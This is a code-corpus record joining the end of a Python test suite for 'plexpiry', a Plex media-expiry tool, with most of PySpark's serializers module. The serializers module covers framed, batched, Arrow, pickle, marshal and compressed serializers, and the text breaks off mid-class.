return open(FAKE_TV_TREE_XML)
raise ValueError("Unknown request: %s" % url.path)
self.useFixture(fixtures.NestedTempfile())
self.stdout = self.useFixture(fixtures.StringStream('stdout')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stdout', self.stdout))
stderr = self.useFixture(fixtures.StringStream('stderr')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr))
self.logger = self.useFixture(fixtures.FakeLogger(name="plexpiry"))
self.useFixture(fixtures.MonkeyPatch('urllib2.urlopen', fake_urlopen))
self.addCleanup(self.cleanUp)
self.options = plexpiry.parse_options(FAKE_OPTIONS)
self.plexpiry = plexpiry.Plexpiry(self.options)
self.plexpiry.find_sections()
def cleanUp(self):
self.options = plexpiry.parse_options(FAKE_OPTIONS)
def test_urlbase(self):
self.assertEqual("http://fakeserver:1234", self.plexpiry.urlbase)
def test_dbg_silence(self):
self.plexpiry.dbg("test_dbg_silence")
self.stdout.seek(0)
self.assertEqual('', self.stdout.read().strip())
def test_dbg_noise(self):
self.options.debug = True
self.plexpiry.dbg("test_dbg_noise")
self.stdout.seek(0)
self.assertEqual("DEBUG: test_dbg_noise", self.stdout.read().strip())
def test_err(self):
self.plexpiry.err("test_err")
self.stdout.seek(0)
self.assertEqual("ERROR: test_err", self.stdout.read().strip())
def test_info(self):
self.plexpiry.info("test_info")
self.stdout.seek(0)
self.assertEqual("INFO: test_info", self.stdout.read().strip())
def test_trim_dict(self):
expected_dict = \
{
'a': 1,
'd': 4,
}
new_dict = self.plexpiry.trim_dict(FAKE_DICT, ['a', 'd'])
self.assertEqual(expected_dict, new_dict)
def test_open_config_file(self):
data = self.plexpiry.open_config_file().read()
self.assertEqual(open(GOOD_CONFIG_FILE).read(), data)
def test_good_config_file(self):
self.plexpiry = plexpiry.Plexpiry(self.options)
self.plexpiry.load_config()
def test_bad_config_file(self):
self.plexpiry = plexpiry.Plexpiry(self.options)
self.options.config_file = BAD_CONFIG_FILE
self.assertRaises(ConfigParser.ParsingError, self.plexpiry.load_config)
self.options.config_file = BAD_CONFIG_FILE2
self.assertRaises(ConfigParser.MissingSectionHeaderError,
self.plexpiry.load_config)
self.assertRaises(ConfigParser.ParsingError,
plexpiry.Plexpiry,
plexpiry.parse_options(FAKE_BADCONFIGFILE_OPTIONS))
def test_empty_config_file(self):
self.plexpiry = plexpiry.Plexpiry(self.options)
self.options.config_file = EMPTY_CONFIG_FILE
self.plexpiry.load_config()
def test_get_config_sections(self):
self.assertEqual(['global', 'movies', 'tv'],
self.plexpiry.get_config_sections())
def test_get_config_section(self):
self.assertEqual({'watched': '30d',
'unwatched': '90d'},
self.plexpiry.get_config_section("global"))
def test_get_config_no_section(self):
self.assertEqual(None, self.plexpiry.get_config_section("bogus"))
def test_collapse_config(self):
self.assertEqual({'__name': 'Spaced',
'unwatched': '90d',
'watched': '30d',
'aired': '365d'},
self.plexpiry.collapse_config("Spaced", "tv"))
def test_parse_time_bare(self):
self.assertEqual(1, self.plexpiry.parse_time('1'))
def test_parse_time_days(self):
self.assertEqual(86400, self.plexpiry.parse_time('1d'))
def test_parse_time_weeks(self):
self.assertEqual(86400 * 7, self.plexpiry.parse_time('1w'))
def test_parse_time_years(self):
self.assertEqual(86400 * 365, self.plexpiry.parse_time('1y'))
def test_parse_time_bogus(self):
self.assertRaises(ValueError, self.plexpiry.parse_time, 'bogus')
def test_parse_time_negative(self):
self.assertRaises(ValueError, self.plexpiry.parse_time, '-1')
def test_find_sections(self):
self.assertEqual(FAKE_SECTIONS, self.plexpiry.sections)
def test_get_tv_tree(self):
self.assertEquals(FAKE_TV_TREE, self.plexpiry.get_tv_tree())
def test_find_tv_shows(self):
shows = self.plexpiry.find_tv_shows()
self.assertEqual(FAKE_TV_SHOWS, shows)
def test_find_tv_seasons(self):
seasons = self.plexpiry.find_tv_seasons(TEST_TV_SHOW)
self.assertEqual(FAKE_TV_SEASONS, seasons)
def test_find_tv_episodes(self):
episodes = self.plexpiry.find_tv_episodes(TEST_TV_SHOW, TEST_TV_SEASON)
self.assertEqual(FAKE_TV_EPISODES, episodes)
def test_get_tv_episode(self):
episode = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
self.assertEqual(FAKE_TV_EPISODE, episode)
def test_get_movies(self):
movies = self.plexpiry.get_movie_tree()
self.assertEqual(FAKE_MOVIES, movies)
def test_get_movie(self):
movie = self.plexpiry.get_movie(TEST_MOVIE)
self.assertEqual(FAKE_MOVIE_ONE, movie)
def test_is_watched(self):
movie = self.plexpiry.get_movie(TEST_MOVIE)
self.assertEqual(True, self.plexpiry.is_watched(movie))
def test_refresh_plex(self):
self.plexpiry.refresh_plex()
self.options.dryrun = True
self.plexpiry.refresh_plex()
def test_should_expire_media_watched(self):
movie = self.plexpiry.get_movie(TEST_MOVIE)
config = self.plexpiry.collapse_config(movie["title"], "movies")
self.assertEqual(['watched'],
self.plexpiry.should_expire_media(movie, config))
def test_should_expire_media_watched_aired(self):
show = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
self.options.config_file = GOOD_CONFIG_FILE
self.plexpiry.load_config()
config = self.plexpiry.collapse_config("Spaced", "tv")
self.assertEqual(['watched', 'aired'],
self.plexpiry.should_expire_media(show,
config))
def test_should_expire_media_noconfig(self):
show = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
self.options.config_file = EMPTY_CONFIG_FILE
self.plexpiry.load_config()
config = self.plexpiry.collapse_config("Spaced", "tv")
self.assertEqual(False, self.plexpiry.should_expire_media(show,
config))
def test_should_expire_media_notexpired(self):
show = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
self.options.config_file = NEVER_EXPIRE_CONFIG_FILE
self.plexpiry.load_config()
config = self.plexpiry.collapse_config("Spaced", "tv")
self.assertEqual(False, self.plexpiry.should_expire_media(show,
config))
def test_should_expire_media_notwatched_aired(self):
show = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
del(show["lastViewedAt"])
self.options.config_file = NON_EXPIRING_CONFIG_FILE
self.plexpiry.load_config()
config = self.plexpiry.collapse_config("Spaced", "tv")
self.assertEqual(['unwatched'],
self.plexpiry.should_expire_media(show, config))
def test_should_expire_media_ignored(self):
show = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
self.options.config_file = IGNORE_CONFIG_FILE
self.plexpiry.load_config()
config = self.plexpiry.collapse_config("Spaced", "tv")
self.assertEqual(False, self.plexpiry.should_expire_media(show,
config))
def test_delete(self):
show = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
self.options.dryrun = True
self.options.debug = True
self.plexpiry.delete(show["ratingKey"])
self.stdout.seek(0)
data = self.stdout.read().strip()
self.assertIn("DELETE http://fakeserver:1234/library/metadata/433",
data)
def test_parse_options(self):
args = ['-d', '-n', '-s', 'foo', '-p', '123', '-c', 'bar']
options = {"debug": True,
"dryrun": True,
"server": "foo",
"port": 123,
"config_file": "bar"}
self.assertEqual(options, vars(plexpiry.parse_options(args)))
def test_parse_options_partial(self):
args = ['-s', 'foo']
options = {"debug": False,
"dryrun": False,
"server": "foo",
"port": 32400,
"config_file": "~/.config/plexpiry.conf"}
self.assertEqual(options, vars(plexpiry.parse_options(args)))
def test_expire(self):
self.options.dryrun = True
self.plexpiry.expire()
def test_expire_ignore_all(self):
self.options.dryrun = True
self.options.config_file = IGNORE_CONFIG_FILE
self.plexpiry.load_config()
self.plexpiry.expire()
| {
"content_hash": "d77a121db661c3b44a95aa6ba2fa067d",
"timestamp": "",
"source": "github",
"line_count": 439,
"max_line_length": 79,
"avg_line_length": 42.66970387243736,
"alnum_prop": 0.549167200512492,
"repo_name": "cmsj/plexpiry",
"id": "6ccd27a63a2295e9272c7dd9a5dad3321421e95f",
"size": "18732",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_plexpiry.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "32201"
}
],
"symlink_target": ""
} |
"""
PySpark supports custom serializers for transferring data; this can improve
performance.
By default, PySpark uses L{PickleSerializer} to serialize objects using Python's
C{cPickle} serializer, which can serialize nearly any Python object.
Other serializers, like L{MarshalSerializer}, support fewer datatypes but can be
faster.
The serializer is chosen when creating L{SparkContext}:
>>> from pyspark.context import SparkContext
>>> from pyspark.serializers import MarshalSerializer
>>> sc = SparkContext('local', 'test', serializer=MarshalSerializer())
>>> sc.parallelize(list(range(1000))).map(lambda x: 2 * x).take(10)
[0, 2, 4, 6, 8, 10, 12, 14, 16, 18]
>>> sc.stop()
PySpark serializes objects in batches; by default, the batch size is chosen based
on the size of objects, also configurable by SparkContext's C{batchSize} parameter:
>>> sc = SparkContext('local', 'test', batchSize=2)
>>> rdd = sc.parallelize(range(16), 4).map(lambda x: x)
Behind the scenes, this creates a JavaRDD with four partitions, each of
which contains two batches of two objects:
>>> rdd.glom().collect()
[[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11], [12, 13, 14, 15]]
>>> int(rdd._jrdd.count())
8
>>> sc.stop()
"""
import sys
from itertools import chain, product
import marshal
import struct
import types
import collections
import zlib
import itertools
if sys.version < '3':
import cPickle as pickle
protocol = 2
from itertools import izip as zip, imap as map
else:
import pickle
protocol = 3
xrange = range
from pyspark import cloudpickle
__all__ = ["PickleSerializer", "MarshalSerializer", "UTF8Deserializer"]
class SpecialLengths(object):
END_OF_DATA_SECTION = -1
PYTHON_EXCEPTION_THROWN = -2
TIMING_DATA = -3
END_OF_STREAM = -4
NULL = -5
START_ARROW_STREAM = -6
class Serializer(object):
def dump_stream(self, iterator, stream):
"""
Serialize an iterator of objects to the output stream.
"""
raise NotImplementedError
def load_stream(self, stream):
"""
Return an iterator of deserialized objects from the input stream.
"""
raise NotImplementedError
def _load_stream_without_unbatching(self, stream):
"""
Return an iterator of deserialized batches (iterable) of objects from the input stream.
        If the serializer does not operate on batches, the default implementation returns an
        iterator of single-element lists.
"""
return map(lambda x: [x], self.load_stream(stream))
# Note: our notion of "equality" is that output generated by
# equal serializers can be deserialized using the same serializer.
# This default implementation handles the simple cases;
# subclasses should override __eq__ as appropriate.
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
def __hash__(self):
return hash(str(self))
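# --- Illustration (added): a minimal concrete Serializer ---
# A sketch of the dump_stream / load_stream contract described above, using a
# newline-delimited JSON encoding. The class name is hypothetical and nothing
# in this module uses it; it only shows how a custom serializer would plug in.
class _JsonLinesExampleSerializer(Serializer):

    def dump_stream(self, iterator, stream):
        import json
        for obj in iterator:
            stream.write(json.dumps(obj).encode("utf-8"))
            stream.write(b"\n")

    def load_stream(self, stream):
        import json
        for line in stream:
            yield json.loads(line.decode("utf-8"))

    def __repr__(self):
        return "_JsonLinesExampleSerializer()"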
class FramedSerializer(Serializer):
"""
Serializer that writes objects as a stream of (length, data) pairs,
where C{length} is a 32-bit integer and data is C{length} bytes.
"""
def __init__(self):
# On Python 2.6, we can't write bytearrays to streams, so we need to convert them
# to strings first. Check if the version number is that old.
self._only_write_strings = sys.version_info[0:2] <= (2, 6)
def dump_stream(self, iterator, stream):
for obj in iterator:
self._write_with_length(obj, stream)
def load_stream(self, stream):
while True:
try:
yield self._read_with_length(stream)
except EOFError:
return
def _write_with_length(self, obj, stream):
serialized = self.dumps(obj)
if serialized is None:
raise ValueError("serialized value should not be None")
if len(serialized) > (1 << 31):
raise ValueError("can not serialize object larger than 2G")
write_int(len(serialized), stream)
if self._only_write_strings:
stream.write(str(serialized))
else:
stream.write(serialized)
def _read_with_length(self, stream):
length = read_int(stream)
if length == SpecialLengths.END_OF_DATA_SECTION:
raise EOFError
elif length == SpecialLengths.NULL:
return None
obj = stream.read(length)
if len(obj) < length:
raise EOFError
return self.loads(obj)
def dumps(self, obj):
"""
Serialize an object into a byte array.
When batching is used, this will be called with an array of objects.
"""
raise NotImplementedError
def loads(self, obj):
"""
Deserialize an object from a byte array.
"""
raise NotImplementedError
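# Illustrative sketch (not part of the original PySpark module): a hedged demo
# of the (length, data) framing described in FramedSerializer above. Each
# object becomes a 4-byte big-endian length followed by its serialized payload.
# PickleSerializer, defined further down in this module, is a concrete
# FramedSerializer. The helper name is hypothetical and the function is never
# called at import time.
def _demo_framed_roundtrip():
    import io
    ser = PickleSerializer()
    buf = io.BytesIO()
    # dump_stream writes one frame per object
    ser.dump_stream([{"a": 1}, [1, 2, 3], "spark"], buf)
    buf.seek(0)
    # load_stream reads frames until EOF and yields the original objects
    assert list(ser.load_stream(buf)) == [{"a": 1}, [1, 2, 3], "spark"]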
class ArrowSerializer(FramedSerializer):
"""
Serializes an Arrow record batch as Arrow data using the Arrow file format.
"""
def dumps(self, batch):
import pyarrow as pa
import io
sink = io.BytesIO()
writer = pa.RecordBatchFileWriter(sink, batch.schema)
writer.write_batch(batch)
writer.close()
return sink.getvalue()
def loads(self, obj):
import pyarrow as pa
reader = pa.RecordBatchFileReader(pa.BufferReader(obj))
return reader.read_all()
def __repr__(self):
return "ArrowSerializer"
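# Illustrative sketch (not part of the original PySpark module): a hedged round
# trip through ArrowSerializer. dumps() writes a RecordBatch in the Arrow file
# format, loads() reads it back as a pyarrow Table. Assumes a pyarrow version
# providing RecordBatchFileWriter/Reader, as used above; the helper name is
# hypothetical and never called at import time.
def _demo_arrow_file_roundtrip():
    import pyarrow as pa
    batch = pa.RecordBatch.from_arrays([pa.array([1, 2, 3])], ["x"])
    data = ArrowSerializer().dumps(batch)   # bytes in the Arrow file format
    table = ArrowSerializer().loads(data)   # read back as a pyarrow Table
    assert table.num_rows == 3 and table.num_columns == 1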
def _create_batch(series, timezone):
"""
Create an Arrow record batch from the given pandas.Series or list of Series, with optional type.
:param series: A single pandas.Series, list of Series, or list of (series, arrow_type)
:param timezone: A timezone to respect when handling timestamp values
:return: Arrow RecordBatch
"""
from pyspark.sql.types import _check_series_convert_timestamps_internal
import pyarrow as pa
# Make input conform to [(series1, type1), (series2, type2), ...]
if not isinstance(series, (list, tuple)) or \
(len(series) == 2 and isinstance(series[1], pa.DataType)):
series = [series]
series = ((s, None) if not isinstance(s, (list, tuple)) else s for s in series)
# If a nullable integer series has been promoted to floating point with NaNs, need to cast
# NOTE: this is not necessary with Arrow >= 0.7
def cast_series(s, t):
if type(t) == pa.TimestampType:
# NOTE: convert to 'us' with astype here, unit ignored in `from_pandas` see ARROW-1680
return _check_series_convert_timestamps_internal(s.fillna(0), timezone)\
.values.astype('datetime64[us]', copy=False)
# NOTE: can not compare None with pyarrow.DataType(), fixed with Arrow >= 0.7.1
elif t is not None and t == pa.date32():
# TODO: this converts the series to Python objects, possibly avoid with Arrow >= 0.8
return s.dt.date
elif t is None or s.dtype == t.to_pandas_dtype():
return s
else:
return s.fillna(0).astype(t.to_pandas_dtype(), copy=False)
# Some object types don't support masks in Arrow, see ARROW-1721
def create_array(s, t):
casted = cast_series(s, t)
mask = None if casted.dtype == 'object' else s.isnull()
return pa.Array.from_pandas(casted, mask=mask, type=t)
arrs = [create_array(s, t) for s, t in series]
return pa.RecordBatch.from_arrays(arrs, ["_%d" % i for i in xrange(len(arrs))])
class ArrowStreamPandasSerializer(Serializer):
"""
Serializes pandas.Series as Arrow data using the Arrow streaming format.
"""
def __init__(self, timezone):
super(ArrowStreamPandasSerializer, self).__init__()
self._timezone = timezone
def dump_stream(self, iterator, stream):
"""
Make ArrowRecordBatches from Pandas Series and serialize. Input is a single series or
a list of series accompanied by an optional pyarrow type to coerce the data to.
"""
import pyarrow as pa
writer = None
try:
for series in iterator:
batch = _create_batch(series, self._timezone)
if writer is None:
write_int(SpecialLengths.START_ARROW_STREAM, stream)
writer = pa.RecordBatchStreamWriter(stream, batch.schema)
writer.write_batch(batch)
finally:
if writer is not None:
writer.close()
def load_stream(self, stream):
"""
Deserialize ArrowRecordBatches to an Arrow table and return as a list of pandas.Series.
"""
from pyspark.sql.types import _check_dataframe_localize_timestamps
import pyarrow as pa
reader = pa.open_stream(stream)
for batch in reader:
# NOTE: changed from pa.Columns.to_pandas, timezone issue in conversion fixed in 0.7.1
pdf = _check_dataframe_localize_timestamps(batch.to_pandas(), self._timezone)
yield [c for _, c in pdf.iteritems()]
def __repr__(self):
return "ArrowStreamPandasSerializer"
class BatchedSerializer(Serializer):
"""
Serializes a stream of objects in batches by calling its wrapped
Serializer with streams of objects.
"""
UNLIMITED_BATCH_SIZE = -1
UNKNOWN_BATCH_SIZE = 0
def __init__(self, serializer, batchSize=UNLIMITED_BATCH_SIZE):
self.serializer = serializer
self.batchSize = batchSize
def _batched(self, iterator):
if self.batchSize == self.UNLIMITED_BATCH_SIZE:
yield list(iterator)
elif hasattr(iterator, "__len__") and hasattr(iterator, "__getslice__"):
n = len(iterator)
for i in xrange(0, n, self.batchSize):
yield iterator[i: i + self.batchSize]
else:
items = []
count = 0
for item in iterator:
items.append(item)
count += 1
if count == self.batchSize:
yield items
items = []
count = 0
if items:
yield items
def dump_stream(self, iterator, stream):
self.serializer.dump_stream(self._batched(iterator), stream)
def load_stream(self, stream):
return chain.from_iterable(self._load_stream_without_unbatching(stream))
def _load_stream_without_unbatching(self, stream):
return self.serializer.load_stream(stream)
def __repr__(self):
return "BatchedSerializer(%s, %d)" % (str(self.serializer), self.batchSize)
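# Illustrative sketch (not part of the original PySpark module): a hedged demo
# of BatchedSerializer, which groups objects into lists before handing them to
# the wrapped FramedSerializer, so each frame on the wire holds a whole batch.
# Uses PickleSerializer (defined later in this module); the helper name is
# hypothetical and never called at import time.
def _demo_batched_roundtrip():
    import io
    ser = BatchedSerializer(PickleSerializer(), 2)
    buf = io.BytesIO()
    ser.dump_stream(range(5), buf)          # written as [0, 1], [2, 3], [4]
    buf.seek(0)
    assert list(ser.load_stream(buf)) == [0, 1, 2, 3, 4]
    buf.seek(0)
    # the unbatched view exposes the underlying batches themselves
    assert list(ser._load_stream_without_unbatching(buf)) == [[0, 1], [2, 3], [4]]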
class FlattenedValuesSerializer(BatchedSerializer):
"""
Serializes a stream of (key, values) pairs, splitting any list of values that
contains more than a certain number of objects into smaller chunks so that the
resulting batches have similar sizes.
"""
def __init__(self, serializer, batchSize=10):
BatchedSerializer.__init__(self, serializer, batchSize)
def _batched(self, iterator):
n = self.batchSize
for key, values in iterator:
for i in range(0, len(values), n):
yield key, values[i:i + n]
def load_stream(self, stream):
return self.serializer.load_stream(stream)
def __repr__(self):
return "FlattenedValuesSerializer(%s, %d)" % (self.serializer, self.batchSize)
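# Illustrative sketch (not part of the original PySpark module): a hedged demo
# of FlattenedValuesSerializer, which splits the value list of each
# (key, values) pair into chunks of at most `batchSize` elements before
# serializing, so very large value lists do not end up in one huge frame.
# Hypothetical helper, never called at import time.
def _demo_flattened_values():
    ser = FlattenedValuesSerializer(PickleSerializer(), 2)
    chunks = list(ser._batched([("k", [1, 2, 3, 4, 5])]))
    assert chunks == [("k", [1, 2]), ("k", [3, 4]), ("k", [5])]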
class AutoBatchedSerializer(BatchedSerializer):
"""
Chooses the batch size automatically based on the serialized size of the objects
"""
def __init__(self, serializer, bestSize=1 << 16):
BatchedSerializer.__init__(self, serializer, self.UNKNOWN_BATCH_SIZE)
self.bestSize = bestSize
def dump_stream(self, iterator, stream):
batch, best = 1, self.bestSize
iterator = iter(iterator)
while True:
vs = list(itertools.islice(iterator, batch))
if not vs:
break
bytes = self.serializer.dumps(vs)
write_int(len(bytes), stream)
stream.write(bytes)
size = len(bytes)
if size < best:
batch *= 2
elif size > best * 10 and batch > 1:
batch //= 2
def __repr__(self):
return "AutoBatchedSerializer(%s)" % self.serializer
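# Illustrative sketch (not part of the original PySpark module): a hedged demo
# of AutoBatchedSerializer, which grows or shrinks the batch while writing so
# that each frame stays close to `bestSize` bytes; reading goes through the
# inherited BatchedSerializer.load_stream. Hypothetical helper, never called
# at import time.
def _demo_auto_batched_roundtrip():
    import io
    ser = AutoBatchedSerializer(PickleSerializer())
    buf = io.BytesIO()
    ser.dump_stream(range(1000), buf)
    buf.seek(0)
    assert list(ser.load_stream(buf)) == list(range(1000))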
class CartesianDeserializer(Serializer):
"""
Deserializes the JavaRDD cartesian() of two PythonRDDs.
Due to PySpark batching we cannot simply use the result of the Java RDD cartesian;
we additionally need to compute the cartesian product within each pair of batches.
"""
def __init__(self, key_ser, val_ser):
self.key_ser = key_ser
self.val_ser = val_ser
def _load_stream_without_unbatching(self, stream):
key_batch_stream = self.key_ser._load_stream_without_unbatching(stream)
val_batch_stream = self.val_ser._load_stream_without_unbatching(stream)
for (key_batch, val_batch) in zip(key_batch_stream, val_batch_stream):
# for correctness with repeated cartesian/zip this must be returned as one batch
yield product(key_batch, val_batch)
def load_stream(self, stream):
return chain.from_iterable(self._load_stream_without_unbatching(stream))
def __repr__(self):
return "CartesianDeserializer(%s, %s)" % \
(str(self.key_ser), str(self.val_ser))
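# Illustrative sketch (not part of the original PySpark module): the stream
# carries alternating key and value batches, and CartesianDeserializer rebuilds
# the cartesian product within each pair of batches. A single key batch and a
# single value batch are written here for brevity. Hypothetical helper, never
# called at import time.
def _demo_cartesian_deserializer():
    import io
    key_ser = BatchedSerializer(PickleSerializer(), 2)
    val_ser = BatchedSerializer(PickleSerializer(), 2)
    buf = io.BytesIO()
    key_ser.dump_stream([1, 2], buf)        # one key batch:   [1, 2]
    val_ser.dump_stream(["a", "b"], buf)    # one value batch: ["a", "b"]
    buf.seek(0)
    pairs = list(CartesianDeserializer(key_ser, val_ser).load_stream(buf))
    assert pairs == [(1, "a"), (1, "b"), (2, "a"), (2, "b")]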
class PairDeserializer(Serializer):
"""
Deserializes the JavaRDD zip() of two PythonRDDs.
Due to PySpark batching we cannot simply use the result of the Java RDD zip;
we additionally need to do the zip within each pair of batches.
"""
def __init__(self, key_ser, val_ser):
self.key_ser = key_ser
self.val_ser = val_ser
def _load_stream_without_unbatching(self, stream):
key_batch_stream = self.key_ser._load_stream_without_unbatching(stream)
val_batch_stream = self.val_ser._load_stream_without_unbatching(stream)
for (key_batch, val_batch) in zip(key_batch_stream, val_batch_stream):
# For double-zipped RDDs, the batches can be iterators from other PairDeserializer,
# instead of lists. We need to convert them to lists if needed.
key_batch = key_batch if hasattr(key_batch, '__len__') else list(key_batch)
val_batch = val_batch if hasattr(val_batch, '__len__') else list(val_batch)
if len(key_batch) != len(val_batch):
raise ValueError("Can not deserialize PairRDD with different number of items"
" in batches: (%d, %d)" % (len(key_batch), len(val_batch)))
# for correctness with repeated cartesian/zip this must be returned as one batch
yield zip(key_batch, val_batch)
def load_stream(self, stream):
return chain.from_iterable(self._load_stream_without_unbatching(stream))
def __repr__(self):
return "PairDeserializer(%s, %s)" % (str(self.key_ser), str(self.val_ser))
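# Illustrative sketch (not part of the original PySpark module): same
# alternating batch layout as CartesianDeserializer above, but the key and
# value batches are zipped element-wise instead of being multiplied out.
# Hypothetical helper, never called at import time.
def _demo_pair_deserializer():
    import io
    key_ser = BatchedSerializer(PickleSerializer(), 2)
    val_ser = BatchedSerializer(PickleSerializer(), 2)
    buf = io.BytesIO()
    key_ser.dump_stream([1, 2], buf)
    val_ser.dump_stream(["a", "b"], buf)
    buf.seek(0)
    pairs = list(PairDeserializer(key_ser, val_ser).load_stream(buf))
    assert pairs == [(1, "a"), (2, "b")]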
class NoOpSerializer(FramedSerializer):
def loads(self, obj):
return obj
def dumps(self, obj):
return obj
# Hook namedtuple, make it picklable
__cls = {}
def _restore(name, fields, value):
""" Restore a namedtuple object from its name, fields, and values. """
k = (name, fields)
cls = __cls.get(k)
if cls is None:
cls = collections.namedtuple(name, fields)
__cls[k] = cls
return cls(*value)
def _hack_namedtuple(cls):
""" Make a class generated by namedtuple picklable. """
name = cls.__name__
fields = cls._fields
def __reduce__(self):
return (_restore, (name, fields, tuple(self)))
cls.__reduce__ = __reduce__
cls._is_namedtuple_ = True
return cls
def _hijack_namedtuple():
""" Hack namedtuple() to make it picklable """
# hijack only one time
if hasattr(collections.namedtuple, "__hijack"):
return
global _old_namedtuple  # otherwise it will be put in the closure
global _old_namedtuple_kwdefaults  # otherwise it will be put in the closure too
def _copy_func(f):
return types.FunctionType(f.__code__, f.__globals__, f.__name__,
f.__defaults__, f.__closure__)
def _kwdefaults(f):
# __kwdefaults__ contains the default values of keyword-only arguments which are
# introduced from Python 3. The possible cases for __kwdefaults__ in namedtuple
# are as below:
#
# - Does not exist in Python 2.
# - Returns None in <= Python 3.5.x.
# - Returns a dictionary containing the default values to the keys from Python 3.6.x
# (See https://bugs.python.org/issue25628).
kargs = getattr(f, "__kwdefaults__", None)
if kargs is None:
return {}
else:
return kargs
_old_namedtuple = _copy_func(collections.namedtuple)
_old_namedtuple_kwdefaults = _kwdefaults(collections.namedtuple)
def namedtuple(*args, **kwargs):
for k, v in _old_namedtuple_kwdefaults.items():
kwargs[k] = kwargs.get(k, v)
cls = _old_namedtuple(*args, **kwargs)
return _hack_namedtuple(cls)
# replace namedtuple with new one
collections.namedtuple.__globals__["_old_namedtuple_kwdefaults"] = _old_namedtuple_kwdefaults
collections.namedtuple.__globals__["_old_namedtuple"] = _old_namedtuple
collections.namedtuple.__globals__["_hack_namedtuple"] = _hack_namedtuple
collections.namedtuple.__code__ = namedtuple.__code__
collections.namedtuple.__hijack = 1
# hack the cls already generated by namedtuple
# those created in other modules can be pickled as normal,
# so only hack those defined in the __main__ module
for n, o in sys.modules["__main__"].__dict__.items():
if (type(o) is type and o.__base__ is tuple
and hasattr(o, "_fields")
and "__reduce__" not in o.__dict__):
_hack_namedtuple(o) # hack inplace
_hijack_namedtuple()
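# Illustrative sketch (not part of the original PySpark module): once
# _hijack_namedtuple() has run (it is invoked just above at import time),
# namedtuple classes reduce to _restore, so their instances can be pickled
# even if the class itself is not importable on the worker. Hypothetical
# helper, never called at import time.
def _demo_namedtuple_pickling():
    Point = collections.namedtuple("Point", "x y")
    p = pickle.loads(pickle.dumps(Point(1, 2)))
    assert p.x == 1 and p.y == 2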
class PickleSerializer(FramedSerializer):
"""
Serializes objects using Python's pickle serializer:
http://docs.python.org/2/library/pickle.html
This serializer supports nearly any Python object, but may
not be as fast as more specialized serializers.
"""
def dumps(self, obj):
return pickle.dumps(obj, protocol)
if sys.version >= '3':
def loads(self, obj, encoding="bytes"):
return pickle.loads(obj, encoding=encoding)
else:
def loads(self, obj, encoding=None):
return pickle.loads(obj)
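# Illustrative sketch (not part of the original PySpark module): a hedged demo
# of PickleSerializer, which handles almost any Python object; dumps()/loads()
# are the per-frame hooks used by FramedSerializer. Hypothetical helper, never
# called at import time.
def _demo_pickle_serializer():
    ser = PickleSerializer()
    payload = ser.dumps({"nested": [1, (2, 3)]})
    assert ser.loads(payload) == {"nested": [1, (2, 3)]}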
class CloudPickleSerializer(PickleSerializer):
def dumps(self, obj):
return cloudpickle.dumps(obj, 2)
class MarshalSerializer(FramedSerializer):
"""
Serializes objects using Python's Marshal serializer:
http://docs.python.org/2/library/marshal.html
This serializer is faster than PickleSerializer but supports fewer datatypes.
"""
def dumps(self, obj):
return marshal.dumps(obj)
def loads(self, obj):
return marshal.loads(obj)
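# Illustrative sketch (not part of the original PySpark module): a hedged demo
# of MarshalSerializer, which is faster than PickleSerializer but only supports
# built-in types (no custom classes, for example). Hypothetical helper, never
# called at import time.
def _demo_marshal_serializer():
    ser = MarshalSerializer()
    data = [1, "two", (3.0, None)]
    assert ser.loads(ser.dumps(data)) == data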
class AutoSerializer(FramedSerializer):
"""
Chooses marshal or pickle as the serialization protocol automatically
"""
def __init__(self):
FramedSerializer.__init__(self)
self._type = None
def dumps(self, obj):
if self._type is not None:
return b'P' + pickle.dumps(obj, -1)
try:
return b'M' + marshal.dumps(obj)
except Exception:
self._type = b'P'
return b'P' + pickle.dumps(obj, -1)
def loads(self, obj):
_type = obj[0:1]  # slice (not index) so the tag is bytes on both Python 2 and 3
if _type == b'M':
return marshal.loads(obj[1:])
elif _type == b'P':
return pickle.loads(obj[1:])
else:
raise ValueError("invalid serialization type: %s" % _type)
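# Illustrative sketch (not part of the original PySpark module): AutoSerializer
# tags each frame with b'M' (marshal) or b'P' (pickle) and, once marshal fails
# for a value, sticks with pickle for all later frames. Hypothetical helper,
# never called at import time.
def _demo_auto_serializer():
    import datetime
    ser = AutoSerializer()
    assert ser.dumps([1, 2, 3])[:1] == b'M'                  # marshal handles built-ins
    assert ser.dumps(datetime.date(2018, 1, 1))[:1] == b'P'  # marshal fails, pickle used
    assert ser.dumps([1, 2, 3])[:1] == b'P'                  # pickle is kept afterwards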
class CompressedSerializer(FramedSerializer):
"""
Compresses the serialized data with zlib
"""
def __init__(self, serializer):
FramedSerializer.__init__(self)
assert isinstance(serializer, FramedSerializer), "serializer must be a FramedSerializer"
self.serializer = serializer
def dumps(self, obj):
return zlib.compress(self.serializer.dumps(obj), 1)
def loads(self, obj):
return self.serializer.loads(zlib.decompress(obj))
def __repr__(self):
return "CompressedSerializer(%s)" % self.serializer
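# Illustrative sketch (not part of the original PySpark module): a hedged demo
# of CompressedSerializer, which wraps another FramedSerializer and
# zlib-compresses each frame's payload; this pays off for repetitive data.
# Hypothetical helper, never called at import time.
def _demo_compressed_serializer():
    ser = CompressedSerializer(PickleSerializer())
    data = list(range(100)) * 100
    blob = ser.dumps(data)
    assert ser.loads(blob) == data
    assert len(blob) < len(PickleSerializer().dumps(data))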
class UTF8Deserializer(Serializer):
"""
Deserializes streams written by String.getBytes.
"""
def __init__(self, use_unicode=True):
self.use_unicode = use_unicode
def loads(self, stream):
length = read_int(stream)
if length == SpecialLengths.END_OF_DATA_SECTION:
raise EOFError
elif length == SpecialLengths.NULL:
return None
s = stream.read(length)
return s.decode("utf-8") if self.use_unicode else s
def load_stream(self, stream):
try:
while True:
yield self.loads(stream)
except struct.error:
return
except EOFError:
return
def __repr__(self):
